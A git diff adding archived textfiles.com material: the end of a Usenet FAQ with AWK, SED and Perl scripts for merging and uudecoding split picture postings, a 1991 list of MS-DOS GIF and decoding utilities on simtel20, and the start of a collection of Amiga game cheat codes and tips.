file. It happens. Fortunately, it doesn't happen +all that often. When it does (and please check all of the other +problems *FIRST*), post to a.b.p.d and request someone to send you +their (working) copy. If enough people post requests of this sort, +eventually the original poster will usually re-post it. If you're the +only person with a problem, someone is bound to send you the file, and +you'll save the net 'hundreds if not thousands of dollars.' + + +IX. APPENDICES: AWK, SED, & PERL SCRIPTS + +Below are the scripts mentioned in section I. I make no assurances as +to how well they work; I use one of the 'super' uudecodes instead. +Not that the SED script will not work unless people follow this recent +trend of putting 'BEGIN' and 'END' in the 'cut here' lines. The AWK & +PERL scripts will work on most files, but some uuencodes put out +nonstandard data, in which case these scripts will bomb and you'll +have to do the work by hand. + +------------------------------------------------------------------------- +AWK script: + +#!/bin/sh + +if [ X$1 != X ] ; then cat $* ; else cat <& 0 ; fi | \ +awk '/begin [0-9]/ {ok = 1} + /^Message/ {ok = 0;next} + /^M/ && (length == 61 || length == 62) {ok = 1} + /[cC]ut [hH]ere/ {ok = 0;next} + /^END-----/ {ok = 0;next} + /^Path:/ {ok = 0;next} + /^$/ {ok = 0;next} + /^-/ {ok = 0;next} + /^_/ {ok = 0;next} + {if (ok) print} + /^end/ {ok = 0}' $* | \ +(cd $HOME/tmp; uudecode) + +-------------------------------------------------------------------------- + +SED idea from Alan Sparks (asparks@viewlogic.com): + +cat $* | sed '/^END/, /^BEGIN/d' | uudecode + + +Recall that this won't work except on files with BEGIN & END as part +of the 'CUT HERE' lines... + +------------------------------------------------------------------------- + +PERL script from Dave Mack (csu@alembic.acs.com): + +#! /usr/local/bin/perl +# +# Combine split uuencoded files into a single data stream with +# e-mail garbage removed and pipe into uudecode. The uuencoded +# files must be in the correct order on the command line - in +# particular the first file must contain the "begin" line and +# the last file must contain the "end" line. +# +# WARNING: this code relies on uuencode putting out all lines +# of the form "M[61 ASCII characters]\n" for every line of the +# file except the last few before the "end" line. If you come +# across a uuencoded file that doesn't do this, you'll need to +# modify the code to handle it. +# +# DISCLAIMER: You use this code at your own risk. Also, don't +# take this is as a sterling example of Perl programming. Corrections +# and improvements welcome. You may do whatever you like with this +# code as long as you leave in some reminder of who the original +# culprit^H^H^H^H^H^H^Hauthor was. +# +# Usage: uumerge filename [filename...] +# Requires Perl 3.0 - my copy is at patchlevel 18 +# +# Dave Mack csu@alembic.ACS.COM +# +# TODO: modify to allow more than one collection of files on +# command line. +# +# KNOWN BUGS: +# +# If some bozo puts a line beginning with "M" in the body of one +# of the intermediate/last chunks, uumerge will assume that uuencoded +# part starts there. +# +# If the last chunk only contains the last two or three lines of +# the uuencoded file (the ones that don't start with "M"), uumerge +# will die. +# +# CHANGES +# +# PATCH 1: +# It appears that some versions of uudecode are too stupid to skip +# past the lines preceding the "begin" line, so feeding a one-part +# uuencoded file to uumerge will bomb. +# +if ($#ARGV < 0 ) { + print "Usage: uumerge filename [filename...]\n"; + exit 1; +} + +$| = 1; +# open a pipe into uudecode +open(DECO,"|uudecode") || die "Can't pipe into uudecode\n"; + +# if we only have one file, pump it straight into uudecode and die +if ( $#ARGV == 0 ) { + open(FIRST,"<$ARGV[0]") || die "Can't open $ARGV[0] for input\n"; + + while ( ) { + # skip past everything before the "begin" line + next unless /^begin [0-9]/; + last; + } + die "$ARGV[0] doesn't contain \"begin\"\n" if eof(FIRST); + + print DECO $_; # the begin line + + while ( ) { + print DECO $_ unless /^end/; + if ( /^end/ ) { + print DECO $_; + last; + } + die "$ARGV[0] doesn't contain \"end\"\n" if eof(FIRST); + } + + # done with file + close(FIRST); + exit 0; +} + +# process the first file - make sure we have a "begin" line + +open(FIRST,"<$ARGV[0]") || die "Can't open $ARGV[0] for input\n"; + +while ( ) { + # skip past everything before the "begin" line + next unless /^begin [0-9]/; + last; +} +die "First file on command line doesn't contain \"begin\"\n" if eof(FIRST); + +print DECO $_; # the begin line + +# the remaining "real" uuencoded lines in this file should begin with "M" +while ( ) { + if ( /^M/ ) { + print DECO $_; + } + else { + last; + } +} + +# done with the first file +close(FIRST); + +# do all except the last file +$maxindex = $#ARGV; +$curr = 1; + +while ( $curr < $maxindex ) { + open(CURR,"<$ARGV[$curr]") || die "Can't open $ARGV[$curr]\n"; + # skip the header junk + while ( ) { + next unless /^$/; + last; + } + # at the body of the message - start looking for /^M/ + while ( ) { + next unless /^M/; + last; + } + die "$ARGV[$curr] isn't a uuencoded file\n" if eof(CURR); + # OK, we're at the start of the good stuff (probably) + print DECO $_; + while ( ) { + if (/^M/) { + print DECO $_; + } + else { + last; + } + } + # done with current file + close(CURR); + $curr++; +} + +# time to do the last file in the set +$curr = $maxindex; +open(CURR,"<$ARGV[$curr]") || die "Can't open $ARGV[$curr]\n"; +# skip the header junk +while ( ) { + next unless /^$/; + last; +} +# at the body of the message - start looking for /^M/ +while ( ) { + next unless /^M/; + last; +} +# OK, we're at the start of the good stuff (probably) +print DECO $_; +while ( ) { + print DECO $_ unless /^end/; + if ( /^end/ ) { + print DECO $_; + last; + } + die "Last file on command line doesn't contain \"end\"\n" if eof(CURR); +} +# done with final file +close(CURR); +# close the pipe to uudecode and exit +close(DECO); +exit(0); + +------------------------------------------------------------------------------- + + +That's about it for this introduction. If you have any suggestions +for things to include in future versions, don't hesitate to let me +know... + +readdm@ccwf.cc.utexas.edu +-- +Dave Read (readdm@ccwf.cc.utexas.edu) | In large, friendly +UT-Austin Nuclear Physics Graduate Student (Slave) | letters were the words +Sometimes I wish life were a game of Asteroids... | Don't Panic. +So I could hit the Hyperspace button. | + + + + +The Stranger ;^{) +------------ +If I sound opinionated, please remember that all opinions expressed +here, though long winded, are strickly my own and are intended to +offend and/or flame no one. If I don't sound opinionated, then you +may disregard this message. "It's either sadness or euphoria."-B. Joel +**** USENET NEWS **** +Group Name: alt.binaries.pictures +Group No: 17 +Message: 1372 +Of: 1420 +Xref: kcbbs alt.binaries.pictures.d:641 alt.binaries.pictures:1372 +Path: kcbbs!aukuni.ac.nz!waikato.ac.nz!decwrl!mips!spool.mu.edu!news.nd.edu!mentor.cc.purdue.edu!mace.cc.purdue.edu!jewell +Newsgroups: alt.binaries.pictures,alt.binaries.pictures.d +Subject: MSDOS utilities available by ftp or e-mail +Message-ID: <17716@mentor.cc.purdue.edu> +From: jewell@mace.cc.purdue.edu (Larry Jewell) +Date: 1 Sep 91 15:42:10 GMT +Sender: news@mentor.cc.purdue.edu +Followup-To: alt.binaries.pictures.d +Lines: 277 + + + Here is a list of utilities for MSDOS systems. I'm posting it here due to + the fact that newer users often aren't aware of the ".d" group and this will + save (hopefully) a lot of unecessary traffic. New Users! please note that + follow-ups to this posting are directed to alt.binaries.pictures.d. + Post discussion THERE! (Of course if your site doesn't get the ".d" group, + someone will still flame-on that you should post there anyway. So ask + you siteadmin to pick it up.) + + If you don't have an MSDOS system, and you post a message asking for help, + PLEASE tell us what kind of system you do have, else you might be answered + by a profound silence, or rude flames. + + If you're testing your posting capabilities, set distribution to LOCAL please + so you don't clutter up the net with "errors". + ............................................................................. + + Following is several lists taken from simtel20's indexes (Thanks, Keith!). + The utilites are listed in the following order: + 1. decoding a uuencoded file. + 2. viewing .gifs on an msdos system + 3. information on .gif formats + 4. How to deal with .tar files on an msdos system. + 5. CRC utilities (checks validity of file.) + 6. Convert from one format to another. + 7. Utilities for MSWindows + 8. Utilities for MSWindows v3.0 + 9. TIFF format. + 10. Everything else ie. PCX, TIFF, GL, etc. + 11. GIF Catalogers + 12. Information about simtel20's files. +If you don't know how to use anonymous ftp, ask your local consultants or site +administrator, or read the articles posted on the 1st and 15th in +comp.binaries.ibm.pc (the article titled "Beginner's Guide to FTP" is the one +you want.) + +NOTE: This list was created on Mon, 29 Jul 91 . +Some files may have been added or deleted since that date. +See file PD1:AAAREAD.ME for additional information. +------------------------------DECODERS------------------------------------------NOTE: .gifs are posted to the net in uudecoded form. You must put numbered +files together without headers or footers and decode them to view. The documentation in these packages should give you a lot of information on how to do this. + + + NOTE: Type B is Binary; Type A is ASCII + + Directory PD1:(at wsmr-simtel20.army.mil) + Directory /mirrors/msdos/filutl (at wuarchive.wustl.edu) + Filename Type Length Date Description + ============================================== +FIXUUE10.ZIP B 4432 910625 Fixes translation problems on UUEncoded files +QUX01_91.ZIP B 11386 910116 Quick UUencode/UUdecode and XXencode/XXdecode +REBUILD2.ZIP B 14051 901108 Rebuild split uuencoded files, w/MSC 5.0 src +TOADUU20.ZIP B 25078 910312 Unix-compat. fast UUEncode/UUDecode, w/ASM src +TOADXX11.ARC B 41371 891029 XXEncode/XXDecode w/overwrite protection v1.1 +UUEXE413.ZIP B 28070 901207 R.E.Marks' UUdecode/UUencode/XXdecode/XXencode +UUSTRIP.ARC B 4448 890407 Make uuencoded bin posting ready for uudecode +UUXFER20.ZIP B 29996 901106 Comprehensive UU/XX en/decoder with C source +------------------------------VIEWERS------------------------------------------- + +NOTE: Type B is Binary; Type A is ASCII + + Directory PD1:(at wsmr-simtel20.army.mil) + Directory mirrors/msdos/gif (at wuarchive.wustl.edu) + Filename Type Length Date Description + ============================================== +CSHW832A.ZIP B 119391 910616 GIF/MAC/RLE view/print, Herc/CGA/EGA/VGA/SVGA +FASTGIF.ARC B 37730 880306 View GIF format files. EGA/VGA only +GDS109.ZIP B 138029 910521 Displays GIFs with unlimited zooming, SVGA/VGA +GIFDES40.ZIP B 42124 910311 View several GIFs at once. Req. VGA w/>=512K +GREY15.ARC B 29793 880523 Grey scale GIF viewer v1.5 MCGA/CGA/VGA +HERV131.ZIP B 33312 910527 View any GIF file on Hercules. Many options +PICVIEW.ARC B 123251 900126 GIF/MAC viewer w/adjustable palette animation +SHWGIF51.ZIP B 27954 901216 View .GIFs while downloading, for EGA/VGA +SNAPVS.ARC B 64628 900120 View GIF files on VGA, print on STAR NX-1000 +TGIF11.ZIP B 8568 910521 GIF cut/grayscale cvt/sharpen image. (VGA req) +VGIF150.ARC B 30380 880523 GIF picture viewer v1.50 CGA/EGA/VGA/HERC +VPIC43.ZIP B 102991 910506 GIF/MAC/PCX/ColorRix pics view/convrt, EGA/VGA +VUIMG311.ZIP B 105936 910709 GIF/GIF89a/TIFF view/print w/Zoom/Pan/Scale +--------------------------INFORMATION------------------------------------------ +How the heck do they DO that? Here's descriptions of the .gif format and +related material. + + NOTE: Type B is Binary; Type A is ASCII + + Directory PD1:(at wsmr-simtel20.army.mil) + Directory mirrors/msdos/gif (at wuarchive.wustl.edu) + Filename Type Length Date Description + ============================================== +89AILLUS.GIF B 2688 901215 Tiny file illustrates GIF89a-use VUIMG280.ZIP +CG89A.GIF B 26624 901109 GIF89a format pic-illustrates transparency etc +EGIF035.ARC B 33003 890625 Determine colors/resolution of GIF image file +GIF.ARC B 52853 880226 Interchange graphics formats +GIF-CSRC.ZIP B 5019 901218 C source code for a GIF decoder +GIF-DOC.ZIP B 35857 901218 Docs re new/old GIF formats & compression +GIF-PAS.ZIP B 59023 901218 Pascal source code for a GIF viewer +GIF89A.ZIP B 22805 901115 Specifications of GIF89A standard from CIS +GIFDECOD.GIF B 6912 890115 GIF drawing explains decoding of GIFs +GIFDOC.ARC B 89706 880801 Specification of GIF standard from CompuServe +GIFENCOD.GIF B 8320 890115 GIF drawing explains encoding of GIFs +GIFLIB12.ZIP B 245747 910809 Turbo C 2.0 library to manipulate GIF images +GIFSRC.ZIP B 41066 901218 Pascal and 8086 ASM source for a GIF viewer +STRIPGIF.ARC B 7214 880902 Strip unneeded characters from .GIF Files +TEXTTST.GIF B 1536 901109 New GIF89a format test picture + +------------------------------.TAR--------------------------------------------- +This extension on a file means it's been compressed, like .zip, .arc, etc. +Save down loading time and decompression them on your "home" machine. + + NOTE: Type B is Binary; Type A is ASCII + + Directory PD1:(at wsmr-simtel20.army.mil) + Directory /mirrors/msdos/filutl (at wuarchive.wustl.edu) + Filename Type Length Date Description + ============================================== +DETAR11.ARC B 20480 880125 Process a TAR file on PC +EXTAR10.ZIP B 10881 910608 Simple TAR unpacker; w/Unix to DOS name conv. +PDTAR.ARC B 117152 880614 Read/write TAR files on PC +TAR.ZIP B 29353 900823 Unix-compatible TAR archive maker/extractor +-------------------------------CRC---------------------------------------------- +Cyclic Redundancy Check, which the poster calculated before he/she posted will +be included in files posted by competent posters. Use one of these utilities to +check a .gif before screaming to the planet that it's "hammered". + + NOTE: Type B is Binary; Type A is ASCII + + Directory PD1:(at wsmr-simtel20.army.mil) + Directory mirrors/msdos/filutl (at wuarchive.wustl.edu) + Filename Type Length Date Description + ============================================== +BRIK.INF A 2617 890731 Description of BRIK.ARC CRC-32 program v2.0 +BRIK2EXE.ARC B 26645 890731 General-purpose CRC-32 program, v2.0 +BRIK2SRC.ARC B 63549 890806 General-purpose CRC-32 pgm, v2.0, C source +CHK4C350.ZIP B 17311 910625 Identifies compressed EXE and COM files +CHKSUM2.ARC B 25228 890313 Compute checksum for 1 or more files +CRC113.ARC B 15098 900120 Displays 16 and 32-bit CRC's of files +CRC2.PAS A 22362 860221 File CRC utility +CRC67.ARC B 4733 860927 Calc. CRC value of files (opt'l. file output) +CRCK.ASM A 5279 850106 File CRC utility +QCRC21.ARC B 22815 880829 Calculate CRC for MS-DOS files +SUM101.ARC B 10020 890407 Unix-like file CRC generation program +---------------------------CONVERTERS------------------------------------------- +Change .gifs to another format, and vice versa. + + NOTE: Type B is Binary; Type A is ASCII + + Directory PD1:(at wsmr-simtel20.army.mil) + Directory mirrors/msdos/gif (at wuarchive.wustl.edu) + Filename Type Length Date Description + ============================================== +BLD2GIF.ARC B 96415 880620 Converts Bsaved VGA screen images to GIFs +CVT2GIF.ZIP B 10046 900713 PIC or PCX to GIF conversion utility, v1.5 +CVTGIF15.ARC B 12746 890910 PIC or PCX to GIF picture conversion utility +GIF.ARC B 52853 880226 Interchange graphics formats +GIF2WP32.ARC B 24897 890127 Convert GIF to WordPerfect Graf. v.3.2 +GIFEXE.ZIP B 29498 910713 Creates .EXE versions of .GIF files +GIFKIT11.ARC B 133321 900223 Utilities for manipulating GIF graphics files +GIFLEX12.ZIP B 477425 910809 Manipulate GIF images. EXEs made from GIFLIB +GIFLIB11.ZIP B 219593 901115 Turbo C 2.0 library to manipulate GIF images +GIFLT140.ZIP B 46242 910810 GIF Lite 1.40 GIF file compression program +GIFWARP1.ZIP B 49584 910416 Reshapes any portion of a GIF +GRABSC11.ZIP B 38235 910112 Save graphics screens to disk, then cvt to GIF +GRAFWK60.ZIP B 328419 910831 View/cvt/print MAC/IMG/GIF/TIFF/EPS graphics +MAC2GIF.ARC B 77206 890801 Convert MAC graphics files to GIFs +MSGIFSCN.ZIP B 20700 910719 Displays info on GIF images, checks validity +PICLB182.ZIP B 152631 901009 24-bit disp.-independent graphics manipulation +PIXIT.ARC B 16143 900203 Converts GIFs to COM and EXE files, w/ASM src +PSTGIF12.ARC B 34039 890613 Convert GIF to EPS w/gray scale translation +SCR2GIF2.ZIP B 27520 900927 Capture EGA/VGA screens, then convert to GIF +SQZGIF13.ZIP B 69489 900807 Reduce large GIF files to 320x200 for printing +TGIF11.ZIP B 8568 910521 GIF cut/grayscale cvt/sharpen image. (VGA req) +VGA2CGA2.ZIP B 64734 900927 Convert VGA GIF files to CGA +VGA2EGA4.ARC B 100089 890421 Convert GIFs to 16-color EGA pictures +VGA2GIF3.ARC B 13788 880829 Capture VGA 256 color to GIF +VPIC43.ZIP B 102991 910506 GIF/MAC/PCX/ColorRix pics view/convrt, EGA/VGA + + Directory PD1: + Directory mirrors/msdos/graphics (at wuarchive.wustl.edu) +EEDRAW22.ZIP B 230115 910809 Electrical eng'g drawing, w/print & GIF output +SCEDIT10.ZIP B 116043 910809 View/change GIF,TGA,BMP,PCX on VESA VGA/TIGA +----------------------------MSWindows------------------------------------------ + + NOTE: Type B is Binary; Type A is ASCII + + Directory PD1:(at wsmr-simtel20.army.mil) + Directory /mirrors/msdos/mswindows (at wuarchive.wustl.edu) + Filename Type Length Date Description + ============================================== +GCP42S.ARC B 50736 890628 New GIF, PCX, MAC viewer for MS Windows +----------------------------MSWindows v 3.0------------------------------------- + NOTE: Type B is Binary; Type A is ASCII + + Directory PD1:(at wsmr-simtel20.army.mil) + Directoyr /mirrors/msdos/windows3 (at wuarchive.wustl.edu) + Filename Type Length Date Description + ============================================== +PS112.ZIP B 27688 901229 WIN3: Paint Shop, manipulate/cvt BMP, GIF, RLE +UUCODE15.ZIP B 22967 910726 Unix-compatible UUencode/UUdecode for Windows3 +WINGIF10.ZIP B 58722 910331 GIF/PCX/RLE->BMP image converter for Windows 3 + +----------------------------TIFF------------------------------------------------ + NOTE: Type B is Binary; Type A is ASCII + + Directory PD1:(at wsmr-simtel20.army.mil) + Directory /mirrors/msdos/tiff (at wuarchive.wustl.edu) + Filename Type Length Date Description + ============================================== +DTIFF.ZIP B 210880 900502 Displays TIFF files on screen, uses TACS +DVTIF1.ZIP B 15932 900416 TIFF reader:PACKBITS compr/uncomp C src, ALDUS +TACS40.ZIP B 126480 900425 TIFF Access/Create System - C source, TIFF 4.0 +TFTOOL.ZIP B 65975 900416 TIFF toolkit developer package C source, ALDUS +TIFF-50.ARC B 71705 891209 Tagged Image File Format specs, v5.0 +TIFFAX.ZIP B 45625 900416 TIFF FAX format definition/example, ALDUS +----------------------------Everything else------------------------------------- + NOTE: Type B is Binary; Type A is ASCII + + Directory PD1:(at wsmr-simtel20.army.mil) + Directory /mirrors/msdos/graphics (at wuarchive.wustl.edu) + Filename Type Length Date Description + ============================================== +ALCHMY14.ZIP B 247389 910324 Targa/EPS/GIF/IFF/PICT/PCX/Sun/TIFF/BMP convrt +DBWRENDR.ZIP B 263680 900403 Ray tracing graphics pgm. v1.02 (MCGA/VGA req) +DISPPIX.ARC B 25076 890725 Viewer for Atari-ST Degas files, EGA/VGA req. +FLILIB.ZIP B 106309 910428 FLI graphics image manipulation library/player +FLIMAKER.ZIP B 50789 910428 Autodesk Animator FLImaker, converts to FLI +GEMCAP40.ZIP B 13254 901007 Saves graphics/text screens as GEM .IMG files +GLFORMAT.ZIP B 10586 910315 Info: Grasp .GL,.PIC,.CLP,.FNT,.SET formats +GRAFWK52.ZIP B 318169 910521 View/cvt/print MAC/IMG/GIF/TIFF/EPS graphics +GRASP32C.ZIP B 55088 910220 Grasp Art automation GL file viewer 3.2 Beta C +HPGLVU10.ZIP B 89457 910429 Viewer for HPGL files, with Turbo Pascal 5 src +INT_70H.ARC B 21755 881216 Fast graphics driver for Hercules (HGC) +IW2GIF.ARC B 9762 900108 Convert Imagewise pictures to GIF format +PCX112.ZIP B 58369 910124 PCX graphics image viewer +PCXDMP30.ZIP B 130517 910726 TSR dumps EGA, VGA & SVGA screens to PCX files +PCXSHO.ZIP B 151750 901223 PCX-Show:Presentation/slide show for PCX files +PCXSHOW3.ZIP B 192519 910724 PCX-Show:Presentation/slide show for PCX files +PCXUT.ZIP B 69410 901223 PCX screen capture & viewing programs +PCX_C.ZIP B 26890 910418 C source to handle PCX format graphics files +PDGRASP.ZIP B 209880 910318 PD Grasp: Creates/modifies .GL animation files +PICEM21.ZIP B 34904 901007 PICEM v2.1 GIF PCX PIC view & conversion +PV13.ZIP B 153087 910428 PicView 1.3 view GIF, MAC, RIX for VGA +RON9PCX1.ZIP B 206443 901014 Shows 9 pictures on screen in reduced format +TGA2TIF.ZIP B 21636 910329 Convert TARGA images to TIFF format +TX2PCX.ZIP B 10171 910124 Converts text screens to PCX files +VESA-TSR.ZIP B 222450 910124 TSR drivers for VESA SuperVGA graphics std. +----------------------------Catalogers---------------------------------------- + NOTE: Type B is Binary; Type A is ASCII + + Directory PD1:(at wsmr-simtel20.army.mil) + Directory /mirrors/msdos/gif (at wuarchive.wustl.edu) + Filename Type Length Date Description + ============================================== + +GLIST112.ARC B 12974 890910 GIF listing utility, version 1.12 + + Directory PD1:(at wsmr-simtel20.army.mil) + Directory /mirrors/msdos/database(at wuarchive.wustl.edu) + Filename Type Length Date Description + ============================================== + +GIFLG11A.ZIP B 47608 910114 GIF file cataloging program +----------------------------Simtel20 information-------------------------------- + NOTE: Type B is Binary; Type A is ASCII + + Directory PD1:(at wsmr-simtel20.army.mil) + Directory /mirrors/msdos/filedocs (at wuarchive.wustl.edu) + Filename Type Length Date Description + ============================================== +AAAREAD.ME A 4543 910628 Information about the files in this directory +DOWNLOAD.INF A 957 910619 How to get SIMTEL20 files via telephone modem +GREP.SIM A 1747 901204 Script to view SIMIBM.IDX on Unix systems +QUICKREF.LST A 2380 910629 Quick reference list to SIMTEL20's MSDOS dirs +SIMLIST.ARC B 264189 910714 Text format list of all MSDOS files w/descrip. +-- +############################################################################## +#Larry W. Jewell (ex-USN) JEWELL@PURCCMACE jewell@mace.cc.purdue.edu # +#Primary-claimer: I have not authorized Purdue to share my opinions. # +#Maintainer of SOC.VETERANS faq, send me the "straight skinny" for inclusion.# + \ No newline at end of file diff --git a/textfiles.com/computers/ami-chts.txt b/textfiles.com/computers/ami-chts.txt new file mode 100644 index 00000000..b16f710d --- /dev/null +++ b/textfiles.com/computers/ami-chts.txt @@ -0,0 +1,4903 @@ + +Aaargh! +------------------------------------------------------------------------------ +You can easily defeat any monster in a fight for an egg, hold your ground and +punch forward, jumping around and breathing fire is not the way to go. After +three or four falls, your foe will stay down. + +Keep eating even if no increase is shown on screen, your health will +skyrocket. + + + +Action Fighter +------------------------------------------------------------------------------ +Try typing in ZBACKDOOR on the high score table to call up the back door and +recieve unlimited lives and energy. + + + +A.P.B. - All Points Bulletin +------------------------------------------------------------------------------ +Activate the siren as you drive along by holding in the fire button, doing +so will cause all vehicles in your path to pull to the side of the road and +let you pass. + + + +Apprentice +------------------------------------------------------------------------------ +Call up the level code section on the title screen by pressing the TAB key, +then enter these codes to go to various levels. + + WIZARD GUILD SPELLS ARCANE DRUID FAERIE + + + +After the War +------------------------------------------------------------------------------ +You can make to the end with the help of invincibility by holding all the +following keys at the same time: + + Level One - ALT 1 B + Level Two - ALT 1 M + +To go directly to level two without the need for play, just enter the code as +101069. + + + +Afterburner +------------------------------------------------------------------------------ +TOGETHER IN ELECTRIC DREAMS and then some keys for various cheats are: + + < - Decrease Level + > - Increase Level + G - Increase Missles + N - Increase Lives + + + +Airball +------------------------------------------------------------------------------ +You can locate the spellbook in the room that also contains the candle. You +must pick up and remove the blocks to get to it. With spellbook in hand, +back to the starting screen you go and drop it into the top left corner. Then +follow the instructions you are given to find the ingredients needed to finish +the game. + + + +All Games +------------------------------------------------------------------------------ +This cheat is not for a game called 'All Games', but rather a cheat that will +work on all games. Attach a genlock and everything runs 25% slower, giving +you a chance to get a feel for those really blazing games that normaly kick +your ass without the trainer. If that's not an economical way to cheat +though, and you are running NTSC and have the necessary setup, boot the game +in PAL to slow it down. PAL users who just can't seem to find a game that +is fast enough for them, take heart, a solution is at hand. Switch your +machine to NTSC and see a dramatic improvement in game speed (18%). + + + +Anarchy +------------------------------------------------------------------------------ +Levelcodes are: + 5400, 0101, 3901, 2602, + 9902, 4303, 9003, 6904, + 3305, 9305, 3406, 0407, + 6407, 2008, 7408, 4709, + 3810, 0511, 6811, 3212, + 0213, 8213, 5014, 1015, + 8215, 5116, 0117, 7017, + 5518, 2819, 9919, 7320, + 2521, 0622, 3722, 1223, + 4523, 4124, 1825, 1926, + 9726, 5927, 0528. + + + +Antep +------------------------------------------------------------------------------ +Go to the nearest town and offer your items for sale. When ased which item +you should attempt to sale, press the keys 1-5. These items are, of course, +non-existant, but the shopkeeper must be blind or totally mad, as he will +cheerily offer you exorbatant amounts of gold for absolutely nothing. The +best thing is, you can repeat this as often as you like and repeatedly sell +the same non-existant item to the same fool many times. Their is but one +problem with this trick, if you hit numbers higher than 5 this will most +certainly crash the game. + + + +Archipelagos +------------------------------------------------------------------------------ +I hate this game. So finish the first two Archipelagos then smash the RETURN +key to select another. Type in the magic number 8421 and bang the RETURN +key a few more times. Now you can go wherever you want. A much easier +solution is to turn off the computer for at least 30 seconds and boot +something else. + + + +Arkanoid +------------------------------------------------------------------------------ +Pressing the SPACE BAR will pause the game and allow you to type DSIMAGIC, but +then you must unpause so you will have all the keys and associated cheats +listed below at your disposal: + + B - Break Opens gates so you can leave, plus bonus points + C - Catch Lets you catch the ball + D - Disrupt Splits into 3 seperate balls + E - Expand Gives you much larger VAUS + F - Finale Skip to last level and fight DOH + L - Laser Lets you shoot bricks + P - Play Bonus Extra man + S - Slow Makes the ball really slow and easy to hit + +Feel free to use each cheat as often as you like, and activate as many modes +as you like at once. Now press ENTER to skip levels. + + + +Arkanoid II - Revenge of DOH +------------------------------------------------------------------------------ +DEBBIE S typed to the high score screen will give you infinite lives. + + + +Arkanoid III +------------------------------------------------------------------------------ +As the pink loading screen comes into view, hold down the CAPS LOCK and type +IMAGINE. As the opening bit begins to play, type away PETEJOHNSONWANTSCHEAT. +Now you may press S and both exits will open allowing you to exit the level +without doing much but typing in the cheat right and making up your mind to +go left or right. How fun. A better cheat would be to type in DALEY88 at +the same pink screen and restart at the same level you last died on. That's +more like it. + + + +Army Moves +------------------------------------------------------------------------------ +The code for part two is 101069. In the first part hold down ALT 1 D for +immunity. To get immunity in teh second part hold down ALT 1 J. + + + +Astro Marine Corp +------------------------------------------------------------------------------ + Level Codes Zone 01 - NOSTROMO Zone 09 - REPLICANT + Zone 03 - DISCOVERY ZONE 11 - KRULL + Zone 05 - ENTERPRISE Zone 13 - METROPOLIS + Zone 07 - DAGOBAH + + + +Atomic Robo Kid +------------------------------------------------------------------------------ +While sitting at the title page type in TUESDAY 14TH and when you press the +fire button to start the game you will be presented with an options screen +that will allow you to obtain infinite lives, etc. + + +Atomino +------------------------------------------------------------------------------ + Level 10 - IDYLL + 20 - TAURUS + 30 - NEPTUNE + 40 - PHOTON + 50 - PLANKTON + 60 - INFERNAL + 70 - FOSSIL + 80 - POISON + 90 - SOUP + 100 - SULPHATE + + + +Atomix +------------------------------------------------------------------------------ +Press HELP and type TIME to bust the clock. + + + +Awesome +------------------------------------------------------------------------------ +To become indestructable, gain infinite money and fuel, complete the first +attack level. When the shields/weapons screen appears, move the cursor to the +top left corner of the screen. This will place it in the shields box. Now +press the joystick button while hitting the + key on the keypad. The screen +will flash, indicating that the cheat mode has been activated. If the screen +does not flash, keep pressing fire and hitting the + key simulataneously. It +will work eventually. Now transfer all the energy to the weapons. Shields +can still be drained by hits and colliding with objects, but once it reaches +000, the ship can not be destroyed. + +To win at the game, simply choose the last planet as the destination. Once +you enter the spaceport, there will be a short animation showing your ship +leaving the galaxy. + +Hold down the + key on the keypad and press fire. Then during play the F1 +key disables enemies, F6 replenishes energy and 1-10 keys give you different +weapons. + + + +Baal +------------------------------------------------------------------------------ +During the load push the right button for infinite lives as the screen blanks. + +Type in LOVEBUNDLE as your name in the hi-score chart to use the games built +in trainer mode. + +In the second cavern there is a force filed that seems impossible to get rid +of. To get to the time machine chunk beyond it, simply fall off the right +side of the phone booth platform above. + +Here are all the coordinates of all the jetpack platforms, in the order you +should go to them to finish the game. X/Y, X being width and Y being height: + +Level 1: 31/16 (cartridge 2), 02/25, 52/30 (cartridge 3), 51/00, + 24/38, 62/13, 02/50, 64/49, 33/58 (exit to level 2). + +Level 2: 34/30, 54/12 (cartridge 4), 16/12, 00/24, 03/34, 30/47, + 54/12 (exit to level 3). + +The jetpack isn't used on level 3. + +The Level 1 teleporter codes are: + + 13 00 29 16 24 + 64 53 50 25 04 + 58 49 48 38 + 32 68 00 29 + +And level 2: + + 12 12 48 56 30 + 17 54 35 02 34 + 24 34 + 02 06 + + + +Back to the Future II +------------------------------------------------------------------------------ +Pause the game whenever you feel like it and type THE ONLY NEAT THING TO DO +then watch the game reset, indicating the cheat mode has been activated. Now +when you play you have infinite lives. + + + +Back to the Future III +------------------------------------------------------------------------------ +During the story type these codes for infinite lives 01 - ROTTEN CHEAT + 02 - LOUSY CHEAT + 03 - LOW DOWN CHEAT + + + +Bane of the Cosmic Forge +------------------------------------------------------------------------------ +The password to enter the door in the SE tower of the 1st level is SNOOPCHERI. +Use the ROTTEN CHEESE on the MOUSEHOLE. + +Some small help for playing the game successfully: + +When you create your characters, it may be a good idea just to make all of +them Dracons. This is untested, but unless you have at least one of this +fire breathing race you surely wont survive the game. So maybe it would be +good to have more. Use a good mix of the classes, try to take one of each +spell class and a good solid thief that is at full strength. Get a good +enough thief and you dont need a fighter. + +It may be slow, but keep rolling till you get the best character possible. +Be sure to make at least one character female, there are places in the game +where this is a must. Dont do it and be sorry later! + +Diversify your skills. Have each character specialise in a few skills +relative to his class. Do not worry about developing weapons skills, you +have no use for them if you created your party correctly. + +In fights early in the game use Dracons breath attack, just be careful not +to overextend yourself. Rest after each encounter, backing up your hard +work. Allways search the area after a combat. + +Search each square you step in. Not only this, but search facing all four +directions, many things can only be found that way. + +Thieves are not always true. If you find a lock and have your thief open it, +allways guess it is POISON unless you are 100% sure (i.e. tried it before) +because it is better to suffer something else than to die by getting this +wrong. + +Dont bash doors early in the game! If your characters are not very strong +you will be sorry. Jammed doors do you no good, as you might never be able +to open them again. Same goes for picking the lock. Wait till you get a +caster capable of conjuring KNOCK KNOCK with at least 18 points (prefereably +24) and do it this way. It is much more sure. + +Once you know there are secret panels or buttons, keep walking past them +until you discover them. You can find them by looking at the maps and know +where they are, sometimes it takes awhile to sense them. + + + +Barbarian (Palace) +------------------------------------------------------------------------------ +On the final level when you confront Drax, walk forward and when the first +fireball comes, jump, then do a forward roll into Drax. If you can't even +get that far then the best way to defeat an oppoent is to roll into him until +he reaches the side, then kick him, roll in to him again and kick him, keep +repeating this method and you'll soon finish the game. + + + +Barbarian (Psygnosis) +------------------------------------------------------------------------------ +Type 04-08-59 for near invulnerability. + +To kill the final Wizard, you must have a shield. When his shot comes at you, +use the defense icon, and it will fly back at him. + + + +Barbarian II (Palace) +------------------------------------------------------------------------------ + Level 1: left, left, right seven times, left, right, left, in the + cave, and right. Level 2: right, 